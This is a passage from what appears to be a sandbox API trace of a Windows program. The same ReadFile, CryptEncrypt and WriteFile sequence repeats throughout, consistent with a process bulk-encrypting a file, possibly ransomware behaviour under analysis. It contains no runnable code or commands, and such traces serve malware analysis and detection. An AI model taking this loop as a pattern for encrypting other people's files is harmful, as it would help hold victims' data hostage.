lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.510] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.511] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.511] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.511] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.511] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.511] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.511] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.511] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.511] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.511] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.511] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.511] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.511] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.511] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.512] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.512] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.512] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.512] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.512] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.512] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.512] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.512] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.512] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.512] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.512] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.512] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.512] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.513] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.513] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.513] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.513] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.513] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.513] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.513] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.513] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.513] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.513] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.513] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.513] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.513] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.514] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.514] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.514] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.514] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.514] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.514] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.514] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.514] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.514] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.514] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.514] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.514] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.514] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.514] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.515] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.515] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.515] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.515] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.515] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.515] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.515] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.515] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.515] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.515] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.515] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.515] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.515] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.516] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.516] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.516] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.516] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.516] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.516] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.516] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.516] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.516] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.516] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.516] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.516] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.516] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.517] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.517] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.517] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.517] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.517] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.518] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.518] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.518] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.519] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.519] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.519] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.519] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.519] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.519] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.519] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.519] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.519] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, 